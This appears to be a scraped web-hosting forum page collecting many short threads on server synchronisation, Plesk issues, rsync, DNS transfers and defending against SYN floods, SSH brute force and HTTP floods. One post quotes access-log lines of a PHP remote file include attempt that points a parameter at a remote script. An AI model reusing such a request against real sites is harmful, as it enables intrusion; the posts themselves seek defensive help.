How To Block Sync Attack
Jul 21, 2007is it possible to block sync attack?
View 2 Repliesis it possible to block sync attack?
View 2 RepliesMy server is under DDOS attack. Its getting more than 1000 SYN_RECV requests. Please let me know how can I protect my server from it.
View 7 Replies View Relatedhow to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using Default Mod_Securty and also Mod_security from [url]
But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.
The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.
=================================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....
I have wrote a shell script that uses public keys to sync data between some servers, the problem is that moving about 20 GB from one server to another, is consuming too much CPU, about 80%. Is this normal? Should I use nice -n +number scp -p bla bla bla.. as syntax to try to get a lower cpu usage?
I'm using RHEL 5.3 on both boxes.
Anyone having difficulties getting this to work? Can't seem to get mail to sync even after the config says everything should be working.
View 1 Replies View RelatedI have a web app that uses MSSQL Server 2005 as it's DB.
I am moving this web app to a new server (new IP addresses)
Once the DNS progation is complete, I need to then syncronize the data between the old DB/server and the new DB/server.
how to sync two MSSQL 2005 dbs?
Or is there another migration technique? (my hoster won't do any IP forwarding in their hardware)
We want to build a file server in our office - either Windows or Linux (doesn't make a difference to us).
We have a lot of satellite offices, and want to have certain computers have access to specific files/folders on the fileserver.
The catch is this... we would like some of our satellite computers to "sync" with the files/folders on the fileserver.
For example, a developer who is constantly working with a particular client, will always want his/her files to sync up with what is on the server.
The developer will want to work with a local copy of the files, and once finished, will upload them to the file server.
A few days go by, and there is a possibility the fileserver has additional information for that client. The developer would then want to download the changed files from the fileserver.
The benefit of working with local files, is that it is quicker to make changes. We can always leave the desktop on overnight to sync between the fileserver and the desktop.
Any suggestions what to look into here?
All of our desktops are on Windows, so we would need a windows application that has this functionality.
Rsync seems to be the closest thing I've found so far.
We are in the process of replacing our site & hardware (all co-located servers) and moving to a five server config with 2 Apache servers, 2 MySQL servers and a stage server (where pages are prepared). The Apache servers utilise mod_proxy_balancer and a PHP/MySQL script to connect to either of the MySQL servers which replicate with each other.
The bit I am a bit stuck on is keeping both the Apache servers in sync with eachother in terms of files (pages & images) - has anyone got any suggestions that could help with this?
Ideally, the images would be placed on the stage server and automatically copied to the 2 Apache servers. I did have one idea which was to put the images on one of the MySQL servers and use that as a file store but then if that goes down, we are in the poo so to speak.
I want to run Rsync to sync a folder from an FTP server - which I have limited access too with my server.
1. Do I have to have rsync installed on the server with the FTP too, as I won't be able to do that as it is not my server.
2. Is Rsync easy enough to get up and running and set it to run every 24hours?
I recieve the error when ClientExec is trying to send email in my rejectlog...
2007-01-28 20:53:17 SMTP protocol synchronization error (input sent without waiting for greeting): rejected connection from H=[255.255.255.255] input="EHLO host.domain.net
HELO host.domain.net
"
I added host.domain.net and 255.255.255.255 to the whitelist files and added this ACL to exim.conf after begin acl:
acl_check_connect:
accept hosts=255.255.255.255
control=no_enforce_sync
accept hosts=host.domain.net
control=no_enforce_sync
accept
If it matters, I am running CentOS4 64-bit, DirectAdmin, Kernel 2.6.18
I have two Plesk servers running on CentOS. I want if one server goes down 2nd will start serve requests to clients. But data should be sync from first server to 2nd server or we can say 2nd will 100% replica of first. So if one server goes down 2nd will start serve users data thats they required like databases, emails and web request.
View 1 Replies View RelatedWhen I try to unlock a subscription I get the following error message. The fact is that I have not customized any time any parameter of this subscription, but has blocked me.ERROR: Call to a member function isDefault() on a non-object (Domain.php:966)
View 6 Replies View RelatedI'am using Plesk 12 Web Pro Edition, I would like to know how can I sync my customers with WHMCS? I have config Plesk Server (at whmcs, module version Plesk 10/11) according to WHMCS. But I still with error and without can sync, users, domains, etc... from plesk web pro to whmcs.
View 3 Replies View RelatedI'm looking for a method to basically clone my plesk site to another hosting provider also running plesk, the idea is so if my site A is down, I can just re-point the dns entry to Site B, and minimize downtime.
It makes sense to me to pay 2x hosting costs so I can have a site mirrored in case the main site goes offline, then I can just switch the dns to the new host. The trick is how can I automatically keep Site B mirrored as part of site A. Using Plesk Backup doesn't seem practical as it's not automatic. Does Cpanel have a site mirroring feature?
Would something like rsync work? Doesn't this require shell access? I'm looking for best practices to be able to mirror Site A to Site B in an automatic method..
I have a 'Service Plan' which has 270 subscriptions associated with it. When I navigate to 'Service Plans' page, underneath my plan it reads "Unable to sync subscriptions with the service plan" along with a yellow exclamation mark.
If I go into the plan there is another message near the "Update & Sync" button stating that syncing will take time and therefore be run in the background. When I click the "Update & Sync" button nothing appears to happen. If I then click on the plan again, as if to edit the settings I get the following "Warning: Subscriptions are currently syncing with the service plan. Please wait until the sync process is finished." and it prevents me from accessing the plan settings.
If I wait a while, I can eventually get into the plan settings again, which should mean that the Update & Sync has completed. However the "Unable to sync subscriptions with the service plan" warning is still present under my custom plan on the 'Service Plans' page and if I navigate to a subscription to check if it has been updated it hasn't.
If I change the subscription plan to another plan and then change it back to my original plan again, then the changes are reflected. But this is obviously a workaround.
Why doesn't the "Update & Sync" button do as it should?
Why is my plan "Unable to sync subscriptions with the service plan"?
I have a subscription and I'm able to switch the subscription to a given service-plan, but I'm unable to sync the subscription with the plan, using the CLI. These are my commands:
/usr/local/psa/bin/subscription --switch-subscription <domain.com> -service-plan Hosting
result => The subscription <domain.com> is now associated with the service plan Hosting..When watching the webinterface in Plesk, I see the domain is "connected" to the service plan, so far so good. However, I notice that the subscription is not synced.
Back to the CLI, I've tried some combinations, but I can't get the subscription synced. The webbased interface keeps telling me that the subscription is unsynced. Here is what I've tried:
/usr/local/psa/bin/subscription --sync-subscription <domain.com>
And I also unlocked it (just in case it was locked) like so: /usr/local/psa/bin/subscription --unlock-subscription <domain.com>
The funny part is that the CLI tells me: "Subscription <domain.com> was synchronized with the associated service plans." but unfortenately it's not if I look through the GUI. Only if I click the sync-option webbased the subscription get synced. we have to transfer over 1000 domains and need to sync these domains with a given service-plan.
I have recently started using the slave DNS manager in the Plesk extension library. I've found that even for DNS zones that are switched off in Plesk, failed sync/transfers still try to take place between the slave and master. Why is this so?
Shouldn't turning the DNS functionality off in Plesk remove the zone from the slave DNS server?
When a domains DNS functionality is turned off, it removed the zone info from the master, but no command is issued to remove it from the slave??
Domain that is trying to sync/transfer: example.com
Plesk/Master server: 111.11.11.111
Slave DNS: 222.222.22.222
Code:
May 6 08:51:39 ns2 named[1178]: zone example.com/IN: refresh: unexpected rcode (REFUSED) from master 111.11.11.111#53 (source 0.0.0.0#0)
May 6 08:51:39 ns2 named[1178]: zone example.com/IN: Transfer started.
May 6 08:51:40 ns2 named[1178]: transfer of 'example.com/IN' from 111.11.11.111#53: connected using 222.222.22.222#53166
[Code] ...
I'm using the migrate tool to clone our production server to a backup server.
I'm using the following command
Code:
cd /opt/psa/bin/
./migrate --migrate-server -host x.x.x.x -password mypwd
I've noticed that the per-domain PHP settings (like open_basedir and include_path) are not transmit to the backup server. Is that the expected behavior ? I would have prefer the migrate tool to include all settings....
I was trying to get Active Sync running on my Windows Server 2008 R2 to be able to sync calenders, adress-books etc. with my mobile without success. With a Linux Server ot seems to be "easy" changeable like posted here: [URL]...
Need getting Active Sync running on my Windows machine? According to the steps in the mentioned post, I failed very early
1. check
2. I changed the following files: =>
"C:inetpubvhostswebmailhordeconfigconf.php"
"C:ParallelsPleskWebmailhordehordeconfigconf.php"
"C:ParallelsPleskWebmailhordehordeconfigconf.php.plesk"
with the values: =>
$conf['auth']['admins'] = array(my mail account);
$conf['activesync']['enabled'] = true;
$conf['activesync']['version'] = '14.1';
3. Rewrite:
here the "problems" start, as of course I don't have the nginx option the question is, where to place the rewrite-rules best?
4. check
5. don't know what to do here, if it even is a problem with the max connections to the imap server?
6. I can restart the mailenable service ?
7. as I have admin rights in horde now, I could do step 7!
That's it? I can't use the active sync features ...
Quote:
Mar 10 20:17:55 host kernel: printk: 102 messages suppressed.
Mar 10 20:17:56 host kernel: printk: 3 messages suppressed.
Mar 10 20:18:01 host kernel: printk: 98 messages suppressed.
Mar 10 20:18:35 host kernel: printk: 34 messages suppressed.
Mar 10 20:18:51 host kernel: printk: 189 messages suppressed.
Mar 10 20:18:56 host kernel: printk: 195 messages suppressed.
Mar 10 20:19:02 host kernel: printk: 249 messages suppressed.
Mar 10 20:19:06 host kernel: printk: 36 messages suppressed.
Mar 10 20:19:21 host kernel: printk: 3 messages suppressed.
Mar 10 20:19:26 host kernel: printk: 342 messages suppressed.
Mar 10 20:19:31 host kernel: printk: 509 messages suppressed.
Mar 10 20:19:47 host kernel: printk: 54 messages suppressed.
Mar 10 20:19:51 host kernel: printk: 421 messages suppressed.
Mar 10 20:19:56 host kernel: printk: 542 messages suppressed.
Mar 10 20:20:01 host kernel: printk: 785 messages suppressed.
Mar 10 20:20:16 host kernel: printk: 340 messages suppressed.
Mar 10 20:20:21 host kernel: printk: 337 messages suppressed.
Mar 10 20:20:26 host kernel: printk: 430 messages suppressed.
Or is this something else? It's been going on for about 40 minutes. I seen my load jump to 20, to 100 and back and fourth
I'm sure that i have Trojans and Viruses on my Server but every time i contacted My Company they ask me to pay money and then they will check and scan my server
so is it any Free application which can scan and remove all bad files on my Server? i'm looking for free applications to scan the whole server
My server stop responding, I couldn't access via webmin or ssh, and DNS were not responding, so I have to ask for a reboot and now everything is fine.
Looking at the logs I found this:
Code:
Jul 18 19:23:12 server sshd[18484]: Failed password for root from 61.145.196.117 port 56817 ssh2
Jul 18 19:23:12 server sshd[18485]: Failed password for root from 61.145.196.117 port 60227 ssh2
Jul 18 19:23:13 server sshd[18488]: Failed password for root from 61.145.196.117 port 38038 ssh2
Jul 18 19:23:15 server sshd[18493]: Failed password for root from 61.145.196.117 port 49884 ssh2
Jul 18 19:24:30 server sshd[18497]: Failed password for root from 61.145.196.117 port 37929 ssh2
Jul 18 19:25:06 server sshd[18521]: Did not receive identification string from 61.145.196.117
Jul 18 19:25:09 server sshd[18508]: Did not receive identification string from 61.145.196.117
Jul 18 19:25:14 server sshd[18505]: fatal: Timeout before authentication for UNKNOWN
Jul 18 19:26:00 server sshd[18509]: Did not receive identification string from 61.145.196.117
And searching that IP on google I found it here: http://www.tcc.edu.tw/netbase/net/in...?fun=240&prd=3
And is flagged as a SSH Attack.
Any ideas why my server stopped working? and how to prevent it?
Im using CentOS 5.0
i found my site load slowly, the cpu load is good. I run this command
[root@host ~]# netstat -nap |grep SYN |wc -l
526
It's seem my server is having problem with SYN attack. Is there anyway to protect it ?
I'm running apache 2.
My site currently in prolong HTTP flood attack since 2 weeks ago. The attack was never stop and for this moment i could only mitigate the attack using my own firewall (hardware).
Since my ISP is not interested to help from upstream, even provide any mitigation services, i could only doing mitigation on my own source or using proxy services alternatively as well, but i've chose to tried on my own. I've tried once on one of well-known mitigation services out there but it seems not fully satisfied me since most of legitimate traffic is blocked from their source.
What i could do now is keep staying alive as well as will not going down on whatever situation becomes worst (but if the attack change to udp attack, i couldn't help myself coz there must be high incoming bandwidth into my network). My network is totaling 10MB last time but since this attack i've been forced to subscribe for 30MB in order to keep balance on the attack.
I've blocked all access except for my country and some other neighbours. If i change policy to allow all countries, the load of firewall will become max and after that hang will hang in less than a minute. I've done load balancing of 4 servers (8GB memory each one) and it seems the condition is getting under control with slight problem of server hang (memory shortage) and very limited keep alive connection.
Now what am i thinking is to buy a router objectively to null route incoming specific IP of countries so i can change my firewall policy to allow all connections as well as to help the firewall itself release its burden halting blocked IP that currently keep hitting itself that could might impact its performance.
Which brands of router is possible doing this thing?
Do you have some other suggestions instead of buying router?
i am just having one issue in one of my highly visited website hangibar.com, its being hosted in softlayer, we are facing synattack too much in this website.
the solution which microsoft given in their website related with tcp/ip registry entry but thing is same , some where and some connections become increases too much over tcp/ip. due to that reason website become very sticky and it stop functioning the execution of sql process, during this issue i have to restart the server to establish a fresh connection.